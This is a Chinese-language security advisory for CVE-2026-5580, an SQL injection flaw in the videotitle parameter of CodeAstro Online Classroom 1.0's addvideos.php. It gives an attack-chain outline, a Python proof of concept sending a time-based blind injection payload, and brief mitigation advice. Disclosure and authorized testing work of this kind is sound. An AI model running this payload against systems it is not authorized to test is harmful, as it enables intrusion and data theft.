CVE-2026-5580 CVSS 6.3 中危

CVE-2026-5580 CodeAstro Online Classroom SQL注入漏洞

披露日期: 2026-04-05

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5580

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

CodeAstro Online Classroom

漏洞概述

CodeAstro Online Classroom 1.0版本在/OnlineClassroom/addvideos.php文件的参数处理组件中存在SQL注入漏洞。攻击者可通过操纵videotitle参数发起远程攻击，导致数据库信息泄露、篡改或服务中断。

技术细节

该漏洞位于CodeAstro Online Classroom 1.0的addvideos.php文件中。由于应用程序未对用户提交的videotitle参数进行有效的过滤或使用预编译语句，导致攻击者能够将恶意SQL代码注入到后端查询语句中。CVSS 3.1评分为6.3，攻击向量为网络（AV:N），攻击复杂度低（AC:L），需要低权限（PR:L）且无需用户交互（UI:N）。攻击者利用此漏洞可绕过逻辑验证，执行未经授权的数据库操作，虽然当前评估的影响范围被标记为低（C:L/I:L/A:L），但仍存在敏感数据泄露的风险。

攻击链分析

STEP 1

侦察

识别目标系统是否运行CodeAstro Online Classroom，并确定addvideos.php接口路径。

STEP 2

获取权限

注册或登录获取低权限账号（如学生或教师账号），满足PR:L的要求。

STEP 3

漏洞利用

向addvideos.php发送POST请求，在videotitle参数中注入恶意SQL语句。

STEP 4

数据窃取或破坏

基于注入的SQL语句，读取数据库敏感信息、修改数据或执行拒绝服务攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_sqli(url):
    """
    PoC for CVE-2026-5580
    Target: /OnlineClassroom/addvideos.php
    Parameter: videotitle
    """
    target = f"{url}/OnlineClassroom/addvideos.php"
    # Time-based blind SQL injection payload
    payload = {
        "videotitle": "test' AND (SELECT SLEEP(5))-- -",
        "videodescription": "test"
    }

    try:
        response = requests.post(target, data=payload, timeout=10)
        if response.elapsed.total_seconds() >= 5:
            return "[+] Vulnerable to SQL Injection"
        else:
            return "[-] Not vulnerable or patched"
    except Exception as e:
        return f"Error: {e}"

if __name__ == "__main__":
    print(check_sqli("http://target-ip"))

影响范围

CodeAstro Online Classroom 1.0

防御指南

临时缓解措施

在未修复前，建议在网络边界部署Web应用防火墙（WAF），拦截包含SQL关键字的非法请求；同时限制对addvideos.php文件的访问权限。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5580
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5580
3 Details https://www.cvedetails.com/cve/CVE-2026-5580/
4 VulDB https://vuldb.com/cve/CVE-2026-5580
5 Link https://codeastro.com/
6 Link https://github.com/zgr0508/cve/issues/3
7 Link https://vuldb.com/submit/783753
8 Link https://vuldb.com/vuln/355350
9 Link https://vuldb.com/vuln/355350/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表